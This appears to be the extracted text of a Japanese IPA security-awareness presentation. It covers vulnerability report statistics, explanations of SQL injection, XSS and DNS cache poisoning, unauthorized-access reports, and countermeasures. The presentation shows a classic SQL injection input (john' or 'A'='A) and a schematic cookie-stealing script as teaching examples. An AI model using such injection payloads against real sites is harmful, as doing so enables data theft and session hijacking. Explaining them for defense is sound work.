情報の適切な流通により、コンピュータ不正アクセス、コンピュータウイルスなど

による被害発生を抑制するために、関係者に推奨する行為をとりまとめた

「情報セキュリティ早期警戒パートナーシップガイドライン」

が公表された。

【受付分析機関】

【調整機関】

脆 弱 性 関 連 情 報 届 出 脆 弱 性 関 連 情 報 通 知 対応状況の集約 公表日調整等

(54)

2.3 脆弱性関連情報の届出状況

届出累計が 約 6,000 件!

 脅威的な届出件数

届出開始から約 4 年間で約 2 千件、ここ 1 年間で 約 3 千件

1 日に平均 4.6 件の届出

'最大 142 件/日、2008年11月7日(

37

96

46

49

66

52

69

54

60

51

43

39

95

103

80

244

208

509

1430

801

386

131

465

511

560

626

678

747

801

861

912

955

994

845

940

1,043 1,123

1,367

1,575

2,084

3,514

4,315

4,701

4,832

0

1,000

2,000

3,000

4,000

5,000

0

200

400

600

800

1000

1200

1400

1Q

2007

2Q

3Q

4Q

1Q

2008

2Q

3Q

4Q

1Q

2009

2Q

3Q

ソフトウェア製品

ウェブサイト

ソフトウェア製品'累計(

ウェブサイト'累計(

(55)

66%

6%

3%

3%

3%

2%

13%

4%

ウェブアプリケーションの脆弱性

バッファのチェックの不備

アクセス制御の不備

仕様上の不備

ファイルのパス名、内容のチェッ クの不備

セキュリティコンテキストの適用の不備

その他実装上の不備

その他ウェブに関連する不備

ソフトウェア製品

脆弱性届出の

原因

別内訳

原因は「ウェブアプリケーションの脆弱性」が最多

 「ウェブアプリケーションソフト」以外のソフトウェア製品で

あっても、

ウェブブラウザから管理・使用するものが多く

そこに脆弱性が存在

(56)

48%

10%

7%

6%

5%

4%

3%

3%

2%

2%

2% 8%

任意のスクリプトの実行

情報の漏洩

なりすまし

任意のコードの実行

サービス不能

任意のコマンドの実行

アクセス制限の回避

任意のファイルへのア クセス

通信の不正中継

データベースの不正操作

認証情報の漏洩

その他

ソフトウェア製品の脆弱性として IPA に届けられ受理した

846

件の内訳

脅威は「任意のスクリプトの実行」が約半分を占める

 これはソフトウェア製品として届けられた脆弱性の種類が、

クロスサイト・スクリプトの脆弱性

であることに起因

ソフトウェア製品

脆弱性届出の

脅威

別内訳

(57)

43%

28%

15%

2%

2%

2% 2% 6%

クロスサイト・スクリプティング

DNS

情報の設定不備

SQL

インジェクション

HTTPSの不適切な利用

ファイルの誤った公開

HTTPレスポンス分割

ディレクトリ・トラバーサル

その他

ウェブサイトの脆弱性として IPA に届けられ受理した

4,708

件の内訳

ウェブサイト脆弱性の種類は「クロスサイト・スクリ

プティング」「SQLインジェクション 」「DNS情報の設定

不備」が全体の86%を占める

ウェブサイト

脆弱性届出の

種類

別内訳

(58)

39%

28%

15%

4%

4%

3%

2% 2% 3%

本物サイト上への偽情報の表示

ドメイン情報の挿入

データの改ざん、消去

Cookie情報の漏洩

個人情報の漏洩

サーバ内ファイルの漏洩

利用者のセキュリティレベルの低下

ウェブキャッシュ情報のすり替え

その他

ウェブサイトの脆弱性として IPA に届けられ受理した

4,708

件の内訳

ウェブサイト脆弱性の脅威は「本物サイト上への

偽情報の表示」「ドメイン情報の挿入」「データの

改ざん、消去」の順で、上位3つは届出の種類と一致

ウェブサイト

脆弱性届出の

脅威

別内訳

(59)

2.4 SQLインジェクションとは?

対象

データベースをバックエンドで利用している

ウェブアプリケーション

原因

データベースへの命令の組立て方に問題

脅威

外部からのアクセスで、データベースを

直接操作されてしまう

※SQL (Structured Query Language)

(60)

SQLインジェクションの動作

ウェブサーバ

ウェブアプリ

データベース

ID john

user

johnの情報

SELECT * FROM user WHERE id=‘$ID’

SQL文例

SELECT * FROM user

WHERE id=

‘ john ’

john

一般利用者

悪意を持つ人

ID john ’ or ‘A’=‘A

全てのユーザ

の情報

SELECT * FROM user

WHERE id= ‘ john’ or ‘A’=‘A ’

john’ or ‘A’=‘A

「全て」を意味する

・データベースから重要な情報が盗まれてしまう

(61)

SQLインジェクションの攻撃傾向

SQLインジェクション攻撃が爆発的に増加!!

SQLインジェクション による改ざん・情報 漏えい事件 ツールによる攻撃 が激化・・JSOCから 注意喚起を配信 さらにツールが進化 水面下で売買 検索エンジンの悪用 2008年12月 攻撃検知数 15,027,791件 ボットネット悪用の 急増 2009年1月 攻撃検知数 1,508,852件 2009年3月 攻撃検知数 285,548件 2009年4月 攻撃検知数 107,282件

(62)

2.5 クロスサイト・スクリプティングとは?

対象

 動的にHTML ページを出力するサイトで、処理実装に問題

があるもの

例:print "<h1>$title</h1>";

原因

 文字列'$title)を出力する際、「

テキスト

」として出力すること

を想定しているにもかかわらず、その実現に

必要な処理

'エスケープ処理(を実装していない

例:

< → &lt;、> → &gt;、 & → &amp;など

脅威

 「

テキスト

」として出力することを想定した箇所に

(63)

クロスサイト・スクリプティングの脆弱性

利用者

ウェブサーバ

検索キーワード IPA

利用者

検索キーワード

<s>IPA</s>

ウェブサーバ

<s>は、取り消し線

を引くHTMLタグ

<html>

【IPA 】を含む検索結果

…</html>

IPA

<html>

<s>IPA</s>

】を含む

検索結果

</html>

<s>IPA</s>

"

<

"

および

"

>

"

が出力され、

HTMLタグ

として

【IPA】を含む

検索結果

【IPA】を含む

検索結果

(64)

クロスサイト・スクリプティングの動作

一般利用者

<script>

…document.

cookie

</script>

】を

含む検索結果

脆弱なウェブサーバ

へのリンク'悪意の

スクリプトを含む(

悪意のある

ウェブサーバ

ウェブサーバ

・ウェブページに好きな文章等を表示させる'ページ改ざん(

・ブラウザ上からは見えない命令を書き込み、情報を盗む

悪意のあるウェブサーバに

セッションCookieをこっそり

送信するようなスクリプト

スクリプトがページ内に

書き込まれる

<script>

document.cookie

…</script>

スクリプト実行

【】を含む

検索結果

検索キーワード

セッションIDや

Cookie

(65)

2.6 DNSキャッシュポイズニングとは?

対象

 DNSキャッシュサーバに対策をしていない場合

原因

 インターネット進化に伴うDNSプロトコルの限界

脅威

 攻撃を受け被害を受けたDNSサーバの利用者が、

攻撃者が用意した偽のウェブサイトやメールサー

バなどに誘導されてしまい、

フィッシング詐欺

メールの情報漏えい

などの被害を受ける。

(66)

DNSキャッシュポイズニングの実現手法

DNS キャッシュサーバ

DNS コンテンツサーバ

クライアント

攻撃者

DNSサービスを実現するサーバ機能

DNS コンテンツサーバ

クライアント

DNS キャッシュサーバ

①再帰的な問合せ

②問合せ

③回答

⑤回答'代理(

⑥再帰的な問合せ

②問合せ

④キャッシュ

偽の

複製

⑤回答

①再帰的な問合せ

③偽の回答

'本物の回答よりも先に送り込む(

偽の

複製

⑦回答'代理(

DNSキャッシュポイズニングの動作

原本

複製

④キャッシュ

原本

(67)

2.7 脆弱性届出・対策に関する考察

脆弱性の発見者はセキュリティの研究者が多い

脆弱性関連情報の届出制度によって解決された脆弱

性を利用した、最新の標的型攻撃も発見されている

2008年3月12日以降に発生しているウェブサイトの

改ざん事件はSQLインジェクションによるものが多い

DNSキャッシュポイズニングの脆弱性を抱えるウェブ

サイトは、比較的容易に発見できる

これらの事から、脆弱性届出の傾向を把握し、適切

な対策を施すことが、重要な優先課題と言える

(68)

3.不正アクセスの届出状況

(69)

目次

3.1 ネットワークに流れる不審な通信

3.2 不正アクセス届出状況

(70)

3.1 ネットワークに流れる不審な通信

典型的なネットワークトラフィック

観測期間: 1週間

• 一般利用者の環境とほぼ同じ観測環境

• 一日あたり119個所の送信元から、約372件の

一方的なアクセス(2009年5月)

135/tcp

IPA インターネット定点観測 TALOT2 (2009/5/18-5/24)

Ping(ICMP)

その他

445/tcp

1433/tcp

1日

アクセス元の数

(71)

3.2 不正アクセス届出状況

(72)

不正アクセス届出種別

「侵入」「その他(被害あり)」が多い

※網掛け部分とカッコ内の数字は、被害があった

※IPAへの届出より集計

届出種別

2008年

侵入

55

メール不正中継

0

ワーム感染

0

DoS(サービス妨害)

11

アドレス詐称

9

その他'被害あり(

45

アクセス形跡'未遂(

21

ワーム形跡

0

その他'被害なし(

14

合計 '件(

155(120)

主な内訳:

・不正プログラム埋め込み

・本人へのなりすまし

(オンラインサービスなど)

(73)

不正アクセス被害内容

ファイルの書き換え'プログラムの埋め込み含む(及びホーム

ページの改ざんの被害が多い

実被害届出1件に複数の被害内容が存在するケースもある

※IPAへの届出より集計

被害内容

2008年

メール不正中継

0

1

不正アカウントの作成

0

5

パスワードファイルの盗用

0

サービス低下

10

オープンプロキシ

1

ファイルの書き換え

54

その他

85

合計 '件(

156(※)

主な内訳: ・本人へのなりすましによる、オンラインサービスの悪用 (フリーメール、ゲームサイト、オークションなど) ・外部サイト攻撃の踏み台として悪用

(74)

不正アクセス被害原因

原因のトップは、ID,パスワード管理・設定の不備

原因不明なケースが33%と、不正アクセスの手口が巧妙化し

原因究明が困難な事例が多い

※IPAへの届出より集計

被害原因

2008年

ID,パスワード管理の不備

35

古いバージョン使用、

パッチ未導入など

16

設定不備

4

不 明

39

その他'DoSなど(

26

合計 '件(

120(※)

(75)

3.3 不正アクセスに関する考察

狙われるのは特別なサイトではない

既知の古い脆弱性

推測され易い、弱いパスワード

「被害内容」として目立って来たもの

他サイト攻撃用の踏み台として悪用された

明らかに金銭を目的とした犯罪

'オンラインゲーム、オークション、個人情報奪取(

基本的な対策で十分防御可能!

犯罪者'組織(がITを駆使し、悪用!

(76)

(付録)情報セキュリティ確保のための

(77)

目次

付-1 基本的な対策方針

付-2 利用者の対策

付-3 組織の対策

付-4 システム管理者・開発者の対策

付-5 情報セキュリティ対策関連情報

(78)

付-1 基本的な対策方針

情報セキュリティに絶対はなく、

事故は起こり得るものと考える

日々増え続けるセキュリティ脅威

狙われる対策や設定の不備

対処療法だけでは不十分

被害者であると同時に、加害者に・・・

全体を見通した、出来るだけ漏れのない

対策を、組織的に実施することが重要

(79)

付-2 利用者の対策

'一般のパソコン利用者(

基本的な対策を講じる

1. あぶない兆候を見逃さない

2. 信頼できないソフトウェアやデータは使わない

3. コンピュータを安全な状態に保つ

対策方針

組織3位

情報漏えい

利用者1位

ウイルスやボット

管理開発者2位

誘導型攻撃

利用者3位

スパムメール

組織1位

DNSキャッシュポイズ

ニング

利用者4位

ユーザID/パスワード

利用者2位

無線LAN暗号

管理開発者3位

組込み製品

組織2位

標的型攻撃

管理開発者1位

正規のウェブサイト

(80)

利用者の対策

'つづき(

'一般のパソコン利用者(

不注意な行動はとらない

•不審なメールを開かない、怪しいサイトはアクセスしない

•軽率な行動'クリック等(を行わない! 一つ一つの行動を理解し行動する

•出所不明なファイルやソフト'ファイル共有ソフトから入手した等(を開かない

•アダルトサイト等で本来の目的外のページが表示された場合、興味本位で閲覧

しない

ソフトウェアやウイルス定義ファイルは常に最新状態に更新

•セキュリティパッチ、バージョンアップ対応

•特に、自動更新されない製品の最新化が重要

•アンチウイルスソフトの定義ファイルを常に最新に維持・定期的なスキャンの実施

セキュリティソフト導入

•パーソナルファイアウォールやPGP等の暗号化ツールを利用

スパムメール対策

•フィルタリングソフトやプロバイダ提供のフィルタリングサービスを利用

具体的対策

(81)

付-3 組織の対策

'イントラネット管理者(

セキュリティを考慮した運用を行う

1. 総合的なセキュリティレベルを保つ

2. 品質管理や保守作業と同様にセキュリティの体制を確保する

対策方針

組織3位

情報漏えい

利用者1位

ウイルスやボット

管理開発者2位

誘導型攻撃

利用者3位

スパムメール

組織1位

DNSキャッシュポイズ

ニング

利用者4位

ユーザID/パスワード

利用者2位

無線LAN暗号

管理開発者3位

組込み製品

組織2位

標的型攻撃

管理開発者1位

正規のウェブサイト

(82)

パスワード強化

•辞書に載っていない文字列を使う

•英字+数字+記号が基本'英字は大小文字を織り交ぜた方がよりベスト(

•文字数よりも文字種の組合せが大切'上記基本的な組合せなら8文字以上(

•LAN Managerハッシュを保存しない設定'Windows OSパスワード(

HDDセキュリティ強化

•HDDに対するパスワード、HDD全体の暗号化

外部記憶メディアに関するセキュリティ強化

•USBメモリなどの利用規制

•パスワード機能やデータの暗号化機能

無線LANの管理強化

•使うのならリスクを理解する'比較的早くセキュリティ強度が陳腐化する(

•ESS-IDの設定'ステルス化(

•接続可能端末の認証'IEEE802.1X、MACアドレスフィルタリング(

•通信の暗号化'WPA2の利用(

具体的対策

組織の対策

'つづき(

'イントラネット管理者(

(83)

セキュリティシステムの利用

•ディレクトリサービス、シンクライアントシステム

•検疫ネットワーク'資産管理機能との連携も可能(

セキュリティ対策機器の導入・監視'イントラ(

•ファイアウォール、IDS/IPS

•内部犯行の抑止/証拠把握、ボット感染状況の把握

•クライアントパソコン監視・制御

自動設定

•対策の自動化'ログ収集、警告発生時のメール転送など(

クライアントパソコン利用者への周知

•問題や対応方法の周知

情報収集

•利用製品の情報収集

管理面からの対応

•セキュリティポリシーの作成/運用

具体的対策

組織の対策

'つづき(

'イントラネット管理者(

参照

関連したドキュメント

市民・市民団体 事業者 行政 施策の方向性 啓発や情報提供. ○

『台灣省行政長官公署公報』2:51946.01.30.出版,P.11 より編集、引用。

 検査に用いた標本は手術直:後に病巣の反対側で噴門

・総務部は、漏洩した個人情報の本人、取引先 などへの通知、スポーツ庁、警察、 IPA などへの届 出、ホームページ、

製品開発者は、 JPCERT/CC から脆弱性関連情報を受け取ったら、ソフトウエア 製品への影響を調査し、脆弱性検証を行い、その結果を

7.法第 25 条第 10 項の規定により準用する第 24 条の2第4項に定めた施設設置管理

必要な情報をすぐ探せない ▶ 部品単位でのリンク参照が冊子横断で可能 二次利用、活用に制約がある ▶

「系統情報の公開」に関する留意事項